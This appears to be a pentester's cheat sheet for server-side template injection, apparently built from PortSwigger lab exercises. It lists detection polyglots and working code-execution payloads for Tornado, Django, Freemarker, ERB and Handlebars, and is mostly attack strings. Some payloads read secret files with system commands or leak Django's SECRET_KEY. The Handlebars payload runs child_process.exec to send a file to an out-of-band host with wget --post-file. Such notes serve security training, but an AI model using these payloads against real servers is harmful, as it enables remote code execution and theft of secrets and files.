# SSTI

Use the web framework native template syntax to inject a malicious payload into a **{{input}}**, which is then executed server-side. Submitting invalid syntax will often result in error message that lead to ***identifying*** the template framework. Use PortSwigger [template decision tree](https://portswigger.net/web-security/images/template-decision-tree.png) to aid in ***identification***.

SSTI manually

<pre><code>#those will throw an error
${{&#x3C;%[%'"}}%\.
<strong>${{&#x3C;%[%'"}}%\.,
</strong>}}{{7*7}} 
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
&#x3C;%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
</code></pre>

### Tornado

```
}}{{ 7*7}}
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')

```

### Django

```
${{<%[%'"}}%\,
{% debug %} 
{{settings.SECRET_KEY}}
```

### Freemarker

```
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
```

### ERB

```
fuzzer${{<%[%'"}}%\<>
<%= 7*7 %>

<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>

<%= system("cat /home/carlos/secret") %>
```

### Handlebars

```
fuzzer${{<%[%'"}}%\,<>

#script to get file end send to collaborator
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}
```